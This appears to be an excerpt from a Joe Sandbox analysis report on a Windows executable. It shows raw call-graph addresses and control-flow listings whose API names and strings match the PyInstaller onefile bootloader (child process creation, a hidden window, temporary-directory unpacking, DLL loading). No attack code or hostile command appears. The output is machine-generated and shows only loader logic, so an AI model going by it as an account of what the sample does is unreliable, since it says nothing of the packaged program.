7ff6aae243bc 17839 7ff6aae22710 54 API calls 17836->17839 17837 7ff6aae243d2 17840 7ff6aae21600 118 API calls 17837->17840 17838->17831 17839->17822 17841 7ff6aae243e0 17840->17841 17841->17822 17844 7ff6aae21c80 49 API calls 17843->17844 17845 7ff6aae24474 17844->17845 17845->16720 17847 7ff6aae21268 17846->17847 17848 7ff6aae21297 17847->17848 17849 7ff6aae2126f 17847->17849 17852 7ff6aae212b1 17848->17852 17853 7ff6aae212d4 17848->17853 17850 7ff6aae22710 54 API calls 17849->17850 17851 7ff6aae21282 17850->17851 17851->17786 17854 7ff6aae34f08 _get_daylight 11 API calls 17852->17854 17857 7ff6aae212e6 17853->17857 17869 7ff6aae21309 memcpy_s 17853->17869 17855 7ff6aae212b6 17854->17855 17856 7ff6aae22910 54 API calls 17855->17856 17868 7ff6aae212cf 17856->17868 17858 7ff6aae34f08 _get_daylight 11 API calls 17857->17858 17859 7ff6aae212eb 17858->17859 17861 7ff6aae22910 54 API calls 17859->17861 17860 7ff6aae3039c _fread_nolock 53 API calls 17860->17869 17861->17868 17863 7ff6aae30110 37 API calls 17863->17869 17865 7ff6aae213cf 17866 7ff6aae22710 54 API calls 17865->17866 17866->17868 17867 7ff6aae30adc 76 API calls 17867->17869 17905 7ff6aae2ba60 17868->17905 17869->17860 17869->17863 17869->17865 17869->17867 17869->17868 17871 7ff6aae245c0 108 API calls 17870->17871 17872 7ff6aae2108c 17871->17872 17873 7ff6aae210a9 17872->17873 17874 7ff6aae21094 17872->17874 17876 7ff6aae306d4 73 API calls 17873->17876 17875 7ff6aae22710 54 API calls 17874->17875 17881 7ff6aae210a4 __vcrt_freefls 17875->17881 17877 7ff6aae210bf 17876->17877 17878 7ff6aae210e6 17877->17878 17879 7ff6aae210c3 17877->17879 17883 7ff6aae210f7 17878->17883 17884 7ff6aae21122 17878->17884 17880 7ff6aae34f08 _get_daylight 11 API calls 17879->17880 17882 7ff6aae210c8 17880->17882 17881->17753 17885 7ff6aae22910 54 API calls 17882->17885 17886 7ff6aae34f08 _get_daylight 11 API calls 17883->17886 17887 7ff6aae21129 17884->17887 17895 7ff6aae2113c 17884->17895 17892 7ff6aae210e1 __vcrt_freefls 17885->17892 17888 7ff6aae21100 17886->17888 17889 7ff6aae21210 92 API calls 17887->17889 17890 7ff6aae22910 54 API calls 17888->17890 17889->17892 17890->17892 17891 7ff6aae3004c 74 API calls 17893 7ff6aae211b4 17891->17893 17892->17891 17893->17881 17909 7ff6aae246f0 17893->17909 17894 7ff6aae3039c _fread_nolock 53 API calls 17894->17895 17895->17892 17895->17894 17896 7ff6aae211ed 17895->17896 17898 7ff6aae34f08 _get_daylight 11 API calls 17896->17898 17899 7ff6aae211f2 17898->17899 17900 7ff6aae22910 54 API calls 17899->17900 17900->17892 17902 7ff6aae30b0c 17901->17902 17923 7ff6aae3082c 17902->17923 17904 7ff6aae30b2a 17904->17791 17906 7ff6aae2ba6e 17905->17906 17907 7ff6aae2bab2 17905->17907 17906->17907 17910 7ff6aae24700 17909->17910 17911 7ff6aae29390 2 API calls 17910->17911 17912 7ff6aae2472b 17911->17912 17913 7ff6aae29390 2 API calls 17912->17913 17922 7ff6aae2479e 17912->17922 17914 7ff6aae24746 17913->17914 17914->17922 17915 7ff6aae2c550 _log10_special 8 API calls 17922->17915 17924 7ff6aae3084c 17923->17924 17925 7ff6aae30879 17923->17925 17924->17925 17926 7ff6aae30856 17924->17926 17927 7ff6aae30881 17924->17927 17925->17904 17928 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17926->17928 17930 7ff6aae3076c 17927->17930 17928->17925 17937 7ff6aae3546c EnterCriticalSection 17930->17937 17939 7ff6aae35031 17938->17939 17940 7ff6aae3505e 17938->17940 17942 7ff6aae34f08 _get_daylight 11 API calls 17939->17942 17950 7ff6aae34fe8 17939->17950 17941 7ff6aae35081 17940->17941 17945 7ff6aae3509d 17940->17945 17944 7ff6aae34f08 _get_daylight 11 API calls 17941->17944 17943 7ff6aae3503b 17942->17943 17946 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17943->17946 17947 7ff6aae35086 17944->17947 17948 7ff6aae34f4c 45 API calls 17945->17948 17949 7ff6aae35046 17946->17949 17951 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17947->17951 17952 7ff6aae35091 17948->17952 17949->17798 17950->17798 17951->17952 17952->17798 17954 7ff6aae24136 17953->17954 17955 7ff6aae34984 49 API calls 17954->17955 17956 7ff6aae2415c 17955->17956 17957 7ff6aae2416d 17956->17957 17958 7ff6aae24560 10 API calls 17956->17958 17957->17809 17959 7ff6aae2417f 17958->17959 17959->17809 17961 7ff6aae27d05 17960->17961 17962 7ff6aae245c0 108 API calls 17961->17962 17963 7ff6aae27d2b 17962->17963 17964 7ff6aae27d52 17963->17964 17965 7ff6aae245c0 108 API calls 17963->17965 17967 7ff6aae2c550 _log10_special 8 API calls 17964->17967 17966 7ff6aae27d42 17965->17966 17968 7ff6aae27d4d 17966->17968 17969 7ff6aae27d5c 17966->17969 17970 7ff6aae24277 17967->17970 17971 7ff6aae3004c 74 API calls 17968->17971 17990 7ff6aae300e4 17969->17990 17970->17818 17970->17822 17971->17964 17977 7ff6aae27d61 17988 7ff6aae218d5 17986->17988 17989 7ff6aae21865 17986->17989 17987 7ff6aae35024 45 API calls 17987->17989 17988->17836 17988->17837 17989->17987 17989->17988 17991 7ff6aae300ed 17990->17991 17992 7ff6aae300fd 17990->17992 17993 7ff6aae34f08 _get_daylight 11 API calls 17991->17993 17992->17977 17994 7ff6aae300f2 17993->17994 18017 7ff6aae35ec8 18016->18017 18018 7ff6aae35eee 18017->18018 18020 7ff6aae35f21 18017->18020 18019 7ff6aae34f08 _get_daylight 11 API calls 18018->18019 18021 7ff6aae35ef3 18019->18021 18022 7ff6aae35f27 18020->18022 18023 7ff6aae35f34 18020->18023 18024 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18021->18024 18025 7ff6aae34f08 _get_daylight 11 API calls 18022->18025 18035 7ff6aae3ac28 18023->18035 18027 7ff6aae24616 18024->18027 18025->18027 18027->16751 18048 7ff6aae402d8 EnterCriticalSection 18035->18048 18408 7ff6aae378f8 18407->18408 18411 7ff6aae373d4 18408->18411 18410 7ff6aae37911 18410->16761 18412 7ff6aae3741e 18411->18412 18413 7ff6aae373ef 18411->18413 18421 7ff6aae3546c EnterCriticalSection 18412->18421 18415 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 18413->18415 18417 7ff6aae3740f 18415->18417 18417->18410 18423 7ff6aae2fe71 18422->18423 18424 7ff6aae2fe43 18422->18424 18431 7ff6aae2fe63 18423->18431 18432 7ff6aae3546c EnterCriticalSection 18423->18432 18425 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 18424->18425 18425->18431 18431->16765 18434 7ff6aae245c0 108 API calls 18433->18434 18435 7ff6aae21493 18434->18435 18436 7ff6aae2149b 18435->18436 18437 7ff6aae214bc 18435->18437 18438 7ff6aae22710 54 API calls 18436->18438 18439 7ff6aae306d4 73 API calls 18437->18439 18440 7ff6aae214ab 18438->18440 18441 7ff6aae214d1 18439->18441 18440->16798 18442 7ff6aae214f8 18441->18442 18443 7ff6aae214d5 18441->18443 18447 7ff6aae21508 18442->18447 18448 7ff6aae21532 18442->18448 18444 7ff6aae34f08 _get_daylight 11 API calls 18443->18444 18445 7ff6aae214da 18444->18445 18446 7ff6aae22910 54 API calls 18445->18446 18455 7ff6aae214f3 __vcrt_freefls 18446->18455 18449 7ff6aae34f08 _get_daylight 11 API calls 18447->18449 18450 7ff6aae21538 18448->18450 18458 7ff6aae2154b 18448->18458 18451 7ff6aae21510 18449->18451 18452 7ff6aae21210 92 API calls 18450->18452 18453 7ff6aae22910 54 API calls 18451->18453 18452->18455 18453->18455 18454 7ff6aae3004c 74 API calls 18457 7ff6aae215c4 18454->18457 18455->18454 18456 7ff6aae3039c _fread_nolock 53 API calls 18456->18458 18457->16798 18458->18455 18458->18456 18459 7ff6aae215d6 18458->18459 18460 7ff6aae34f08 _get_daylight 11 API calls 18459->18460 18461 7ff6aae215db 18460->18461 18462 7ff6aae22910 54 API calls 18461->18462 18462->18455 18464 7ff6aae29390 2 API calls 18463->18464 18465 7ff6aae28e94 LoadLibraryExW 18464->18465 18466 7ff6aae28eb3 __vcrt_freefls 18465->18466 18466->16832 18540 7ff6aae26375 18539->18540 18541 7ff6aae21c80 49 API calls 18540->18541 18542 7ff6aae263b1 18541->18542 18543 7ff6aae263ba 18542->18543 18544 7ff6aae263dd 18542->18544 18545 7ff6aae22710 54 API calls 18543->18545 18546 7ff6aae24630 49 API calls 18544->18546 18562 7ff6aae263d3 18545->18562 18547 7ff6aae263f5 18546->18547 18548 7ff6aae26413 18547->18548 18549 7ff6aae22710 54 API calls 18547->18549 18550 7ff6aae24560 10 API calls 18548->18550 18549->18548 18552 7ff6aae2641d 18550->18552 18551 7ff6aae2c550 _log10_special 8 API calls 18553 7ff6aae2336e 18551->18553 18554 7ff6aae2642b 18552->18554 18555 7ff6aae28e80 3 API calls 18552->18555 18553->16867 18570 7ff6aae26500 18553->18570 18556 7ff6aae24630 49 API calls 18554->18556 18555->18554 18557 7ff6aae26444 18556->18557 18558 7ff6aae26469 18557->18558 18559 7ff6aae26449 18557->18559 18561 7ff6aae28e80 3 API calls 18558->18561 18560 7ff6aae22710 54 API calls 18559->18560 18560->18562 18563 7ff6aae26476 18561->18563 18562->18551 18564 7ff6aae264c1 18563->18564 18565 7ff6aae26482 18563->18565 18629 7ff6aae25830 GetProcAddress 18564->18629 18566 7ff6aae29390 2 API calls 18565->18566 18568 7ff6aae2649a GetLastError 18566->18568 18569 7ff6aae22c50 51 API calls 18568->18569 18569->18562 18719 7ff6aae25400 18570->18719 18572 7ff6aae26526 18573 7ff6aae2653f 18572->18573 18574 7ff6aae2652e 18572->18574 18726 7ff6aae24c90 18573->18726 18575 7ff6aae22710 54 API calls 18574->18575 18581 7ff6aae2653a 18575->18581 18578 7ff6aae2654b 18580 7ff6aae22710 54 API calls 18578->18580 18579 7ff6aae2655c 18582 7ff6aae2656c 18579->18582 18584 7ff6aae2657d 18579->18584 18580->18581 18581->16869 18608 7ff6aae26070 18607->18608 18608->18608 18630 7ff6aae2587f GetProcAddress 18629->18630 18631 7ff6aae25852 GetLastError 18629->18631 18633 7ff6aae2589b GetLastError 18630->18633 18634 7ff6aae258aa GetProcAddress 18630->18634 18632 7ff6aae2585f 18631->18632 18635 7ff6aae22c50 51 API calls 18632->18635 18633->18632 18636 7ff6aae258c6 GetLastError 18634->18636 18637 7ff6aae258d5 GetProcAddress 18634->18637 18636->18632 18721 7ff6aae2542c 18719->18721 18720 7ff6aae25434 18720->18572 18721->18720 18724 7ff6aae255d4 18721->18724 18750 7ff6aae36aa4 18721->18750 18722 7ff6aae25797 __vcrt_freefls 18722->18572 18723 7ff6aae247d0 47 API calls 18723->18724 18724->18722 18724->18723 18727 7ff6aae24cc0 18726->18727 18728 7ff6aae2c550 _log10_special 8 API calls 18727->18728 18729 7ff6aae24d2a 18728->18729 18729->18578 18729->18579 18751 7ff6aae36ad4 18750->18751 18754 7ff6aae35fa0 18751->18754 18753 7ff6aae36b04 18753->18721 18755 7ff6aae35fd1 18754->18755 18756 7ff6aae35fe3 18754->18756 18757 7ff6aae34f08 _get_daylight 11 API calls 18755->18757 18758 7ff6aae3602d 18756->18758 18760 7ff6aae35ff0 18756->18760 18759 7ff6aae35fd6 18757->18759 18761 7ff6aae36048 18758->18761 18762 7ff6aae347c0 45 API calls 18758->18762 18764 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 18759->18764 18765 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 18760->18765 18766 7ff6aae3606a 18761->18766 18775 7ff6aae36a2c 18761->18775 18762->18761 18770 7ff6aae35fe1 18764->18770 18765->18770 18767 7ff6aae3610b 18766->18767 18768 7ff6aae34f08 _get_daylight 11 API calls 18766->18768 18769 7ff6aae34f08 _get_daylight 11 API calls 18767->18769 18767->18770 18771 7ff6aae36100 18768->18771 18770->18753 18776 7ff6aae36a66 18775->18776 18777 7ff6aae36a4f 18775->18777 18827->16875 18829 7ff6aae3b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18828->18829 18831 7ff6aae3a3e1 18829->18831 18830 7ff6aae3a504 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18832 7ff6aae3a401 18830->18832 18831->18830

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 7ff6aae289e0-7ff6aae28b26 call 7ff6aae2c850 call 7ff6aae29390 SetConsoleCtrlHandler GetStartupInfoW call 7ff6aae353f0 call 7ff6aae3a47c call 7ff6aae3871c call 7ff6aae353f0 call 7ff6aae3a47c call 7ff6aae3871c call 7ff6aae353f0 call 7ff6aae3a47c call 7ff6aae3871c GetCommandLineW CreateProcessW 23 7ff6aae28b28-7ff6aae28b48 GetLastError call 7ff6aae22c50 0->23 24 7ff6aae28b4d-7ff6aae28b89 RegisterClassW 0->24 31 7ff6aae28e39-7ff6aae28e5f call 7ff6aae2c550 23->31 26 7ff6aae28b8b GetLastError 24->26 27 7ff6aae28b91-7ff6aae28be5 CreateWindowExW 24->27 26->27 29 7ff6aae28be7-7ff6aae28bed GetLastError 27->29 30 7ff6aae28bef-7ff6aae28bf4 ShowWindow 27->30 32 7ff6aae28bfa-7ff6aae28c0a WaitForSingleObject 29->32 30->32 34 7ff6aae28c88-7ff6aae28c8f 32->34 35 7ff6aae28c0c 32->35 36 7ff6aae28c91-7ff6aae28ca1 WaitForSingleObject 34->36 37 7ff6aae28cd2-7ff6aae28cd9 34->37 39 7ff6aae28c10-7ff6aae28c13 35->39 40 7ff6aae28df8-7ff6aae28e02 36->40 41 7ff6aae28ca7-7ff6aae28cb7 TerminateProcess 36->41 42 7ff6aae28dc0-7ff6aae28dd9 GetMessageW 37->42 43 7ff6aae28cdf-7ff6aae28cf5 QueryPerformanceFrequency QueryPerformanceCounter 37->43 44 7ff6aae28c1b-7ff6aae28c22 39->44 45 7ff6aae28c15 GetLastError 39->45 49 7ff6aae28e11-7ff6aae28e35 GetExitCodeProcess CloseHandle * 2 40->49 50 7ff6aae28e04-7ff6aae28e0a DestroyWindow 40->50 51 7ff6aae28cb9 GetLastError 41->51 52 7ff6aae28cbf-7ff6aae28ccd WaitForSingleObject 41->52 47 7ff6aae28ddb-7ff6aae28de9 TranslateMessage DispatchMessageW 42->47 48 7ff6aae28def-7ff6aae28df6 42->48 53 7ff6aae28d00-7ff6aae28d38 MsgWaitForMultipleObjects PeekMessageW 43->53 44->36 46 7ff6aae28c24-7ff6aae28c41 PeekMessageW 44->46 45->44 54 7ff6aae28c76-7ff6aae28c86 WaitForSingleObject 46->54 55 7ff6aae28c43-7ff6aae28c74 TranslateMessage DispatchMessageW PeekMessageW 46->55 47->48 48->40 48->42 49->31 50->49 51->52 52->40 56 7ff6aae28d3a 53->56 57 7ff6aae28d73-7ff6aae28d7a 53->57 54->34 54->39 55->54 55->55 58 7ff6aae28d40-7ff6aae28d71 TranslateMessage DispatchMessageW PeekMessageW 56->58 57->42 59 7ff6aae28d7c-7ff6aae28da5 QueryPerformanceCounter 57->59 58->57 58->58 59->53 60 7ff6aae28dab-7ff6aae28db2 59->60 60->40 61 7ff6aae28db4-7ff6aae28db8 60->61 61->42
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                • Instruction ID: 2ae6a8ba60916e4bab8cb423c5292007305597ad804f8c17f686da115211ff08
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6ED16632A0AB82C6EB10AF75E8542BD3764FF84758F4041B6DA5D83AA4DF3DD54AD700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 62 7ff6aae21000-7ff6aae23806 call 7ff6aae2fe18 call 7ff6aae2fe20 call 7ff6aae2c850 call 7ff6aae353f0 call 7ff6aae35484 call 7ff6aae236b0 76 7ff6aae23808-7ff6aae2380f 62->76 77 7ff6aae23814-7ff6aae23836 call 7ff6aae21950 62->77 78 7ff6aae23c97-7ff6aae23cb2 call 7ff6aae2c550 76->78 82 7ff6aae2391b-7ff6aae23931 call 7ff6aae245c0 77->82 83 7ff6aae2383c-7ff6aae23856 call 7ff6aae21c80 77->83 90 7ff6aae2396a-7ff6aae2397f call 7ff6aae22710 82->90 91 7ff6aae23933-7ff6aae23960 call 7ff6aae27f90 82->91 87 7ff6aae2385b-7ff6aae2389b call 7ff6aae28830 83->87 96 7ff6aae2389d-7ff6aae238a3 87->96 97 7ff6aae238c1-7ff6aae238cc call 7ff6aae34f30 87->97 99 7ff6aae23c8f 90->99 103 7ff6aae23962-7ff6aae23965 call 7ff6aae3004c 91->103 104 7ff6aae23984-7ff6aae239a6 call 7ff6aae21c80 91->104 100 7ff6aae238af-7ff6aae238bd call 7ff6aae289a0 96->100 101 7ff6aae238a5-7ff6aae238ad 96->101 111 7ff6aae239fc-7ff6aae23a2a call 7ff6aae28940 call 7ff6aae289a0 * 3 97->111 112 7ff6aae238d2-7ff6aae238e1 call 7ff6aae28830 97->112 99->78 100->97 101->100 103->90 113 7ff6aae239b0-7ff6aae239b9 104->113 138 7ff6aae23a2f-7ff6aae23a3e call 7ff6aae28830 111->138 119 7ff6aae238e7-7ff6aae238ed 112->119 120 7ff6aae239f4-7ff6aae239f7 call 7ff6aae34f30 112->120 113->113 117 7ff6aae239bb-7ff6aae239d8 call 7ff6aae21950 113->117 117->87 130 7ff6aae239de-7ff6aae239ef call 7ff6aae22710 117->130 123 7ff6aae238f0-7ff6aae238fc 119->123 120->111 127 7ff6aae238fe-7ff6aae23903 123->127 128 7ff6aae23905-7ff6aae23908 123->128 127->123 127->128 128->120 131 7ff6aae2390e-7ff6aae23916 call 7ff6aae34f30 128->131 130->99 131->138 141 7ff6aae23b45-7ff6aae23b53 138->141 142 7ff6aae23a44-7ff6aae23a47 138->142 143 7ff6aae23a67 141->143 144 7ff6aae23b59-7ff6aae23b5d 141->144 142->141 145 7ff6aae23a4d-7ff6aae23a50 142->145 146 7ff6aae23a6b-7ff6aae23a90 call 7ff6aae34f30 143->146 144->146 147 7ff6aae23a56-7ff6aae23a5a 145->147 148 7ff6aae23b14-7ff6aae23b17 145->148 157 7ff6aae23aab-7ff6aae23ac0 146->157 158 7ff6aae23a92-7ff6aae23aa6 call 7ff6aae28940 146->158 147->148 149 7ff6aae23a60 147->149 150 7ff6aae23b19-7ff6aae23b1d 148->150 151 7ff6aae23b2f-7ff6aae23b40 call 7ff6aae22710 148->151 149->143 150->151 155 7ff6aae23b1f-7ff6aae23b2a 150->155 159 7ff6aae23c7f-7ff6aae23c87 151->159 155->146 161 7ff6aae23ac6-7ff6aae23aca 157->161 162 7ff6aae23be8-7ff6aae23bfa call 7ff6aae28830 157->162 158->157 159->99 164 7ff6aae23bcd-7ff6aae23be2 call 7ff6aae21940 161->164 165 7ff6aae23ad0-7ff6aae23ae8 call 7ff6aae35250 161->165 170 7ff6aae23bfc-7ff6aae23c02 162->170 171 7ff6aae23c2e 162->171 164->161 164->162 175 7ff6aae23aea-7ff6aae23b02 call 7ff6aae35250 165->175 176 7ff6aae23b62-7ff6aae23b7a call 7ff6aae35250 165->176 173 7ff6aae23c1e-7ff6aae23c2c 170->173 174 7ff6aae23c04-7ff6aae23c1c 170->174 177 7ff6aae23c31-7ff6aae23c40 call 7ff6aae34f30 171->177 173->177 174->177 175->164 186 7ff6aae23b08-7ff6aae23b0f 175->186 184 7ff6aae23b87-7ff6aae23b9f call 7ff6aae35250 176->184 185 7ff6aae23b7c-7ff6aae23b80 176->185 187 7ff6aae23c46-7ff6aae23c4a 177->187 188 7ff6aae23d41-7ff6aae23d63 call 7ff6aae244e0 177->188 201 7ff6aae23bac-7ff6aae23bc4 call 7ff6aae35250 184->201 202 7ff6aae23ba1-7ff6aae23ba5 184->202 185->184 186->164 191 7ff6aae23c50-7ff6aae23c5f call 7ff6aae290e0 187->191 192 7ff6aae23cd4-7ff6aae23ce6 call 7ff6aae28830 187->192 199 7ff6aae23d71-7ff6aae23d82 call 7ff6aae21c80 188->199 200 7ff6aae23d65-7ff6aae23d6f call 7ff6aae24630 188->200 203 7ff6aae23c61 191->203 204 7ff6aae23cb3-7ff6aae23cb6 call 7ff6aae28660 191->204 205 7ff6aae23ce8-7ff6aae23ceb 192->205 206 7ff6aae23d35-7ff6aae23d3c 192->206 213 7ff6aae23d87-7ff6aae23d96 199->213 200->213 201->164 221 7ff6aae23bc6 201->221 202->201 210 7ff6aae23c68 call 7ff6aae22710 203->210 220 7ff6aae23cbb-7ff6aae23cbd 204->220 205->206 211 7ff6aae23ced-7ff6aae23d10 call 7ff6aae21c80 205->211 206->210 222 7ff6aae23c6d-7ff6aae23c77 210->222 228 7ff6aae23d2b-7ff6aae23d33 call 7ff6aae34f30 211->228 229 7ff6aae23d12-7ff6aae23d26 call 7ff6aae22710 call 7ff6aae34f30 211->229 218 7ff6aae23d98-7ff6aae23d9f 213->218 219 7ff6aae23dbc-7ff6aae23dd2 call 7ff6aae29390 213->219 218->219 224 7ff6aae23da1-7ff6aae23da5 218->224 234 7ff6aae23de0-7ff6aae23dfc SetDllDirectoryW 219->234 235 7ff6aae23dd4 219->235 226 7ff6aae23cc8-7ff6aae23ccf 220->226 227 7ff6aae23cbf-7ff6aae23cc6 220->227 221->164 222->159 224->219 230 7ff6aae23da7-7ff6aae23db6 LoadLibraryExW 224->230 226->213 227->210 228->213 229->222 230->219 236 7ff6aae23ef9-7ff6aae23f00 234->236 237 7ff6aae23e02-7ff6aae23e11 call 7ff6aae28830 234->237 235->234 242 7ff6aae23f06-7ff6aae23f0d 236->242 243 7ff6aae24000-7ff6aae24008 236->243 250 7ff6aae23e2a-7ff6aae23e34 call 7ff6aae34f30 237->250 251 7ff6aae23e13-7ff6aae23e19 237->251 242->243 248 7ff6aae23f13-7ff6aae23f1d call 7ff6aae233c0 242->248 244 7ff6aae2400a-7ff6aae24027 PostMessageW GetMessageW 243->244 245 7ff6aae2402d-7ff6aae2405f call 7ff6aae236a0 call 7ff6aae23360 call 7ff6aae23670 call 7ff6aae26fc0 call 7ff6aae26d70 243->245 244->245 248->222 258 7ff6aae23f23-7ff6aae23f37 call 7ff6aae290c0 248->258 263 7ff6aae23eea-7ff6aae23ef4 call 7ff6aae28940 250->263 264 7ff6aae23e3a-7ff6aae23e40 250->264 254 7ff6aae23e1b-7ff6aae23e23 251->254 255 7ff6aae23e25-7ff6aae23e27 251->255 254->255 255->250 269 7ff6aae23f39-7ff6aae23f56 PostMessageW GetMessageW 258->269 270 7ff6aae23f5c-7ff6aae23f72 call 7ff6aae28940 call 7ff6aae289e0 258->270 263->236 264->263 268 7ff6aae23e46-7ff6aae23e4c 264->268 272 7ff6aae23e57-7ff6aae23e59 268->272 273 7ff6aae23e4e-7ff6aae23e50 268->273 269->270 285 7ff6aae23f77-7ff6aae23f9f call 7ff6aae26fc0 call 7ff6aae26d70 call 7ff6aae288e0 270->285 272->236 276 7ff6aae23e5f-7ff6aae23e7b call 7ff6aae26dc0 call 7ff6aae27340 272->276 273->276 277 7ff6aae23e52 273->277 289 7ff6aae23e86-7ff6aae23e8d 276->289 290 7ff6aae23e7d-7ff6aae23e84 276->290 277->236 311 7ff6aae23fed-7ff6aae23ffb call 7ff6aae21900 285->311 312 7ff6aae23fa1-7ff6aae23fb7 call 7ff6aae28ed0 call 7ff6aae288e0 285->312 293 7ff6aae23ea7-7ff6aae23eb1 call 7ff6aae271b0 289->293 294 7ff6aae23e8f-7ff6aae23e9c call 7ff6aae26e00 289->294 292 7ff6aae23ed3-7ff6aae23ee8 call 7ff6aae22a50 call 7ff6aae26fc0 call 7ff6aae26d70 290->292 292->236 306 7ff6aae23ebc-7ff6aae23eca call 7ff6aae274f0 293->306 307 7ff6aae23eb3-7ff6aae23eba 293->307 294->293 305 7ff6aae23e9e-7ff6aae23ea5 294->305 305->292 306->236 317 7ff6aae23ecc 306->317 307->292 311->222 312->311 323 7ff6aae23fb9-7ff6aae23fce 312->323 317->292 324 7ff6aae23fe8 call 7ff6aae22a50 323->324 325 7ff6aae23fd0-7ff6aae23fe3 call 7ff6aae22710 call 7ff6aae21900 323->325 324->311 325->222
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                • Opcode ID: 0fbc70c4027613d0d861555d20556e9b1b6679d528821aa3e7ef290c14fd0fef
                                                                                                                                                                                                                                • Instruction ID: 2ed852f348e4d7a50afa9d34b83816faacc4a3152e6a9a991ca1e42653f8ef3d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fbc70c4027613d0d861555d20556e9b1b6679d528821aa3e7ef290c14fd0fef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF325731A0A683D1FE29BF2194552B966A1BF84780F8440F3DA4DC3296EF3CE55EE710

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
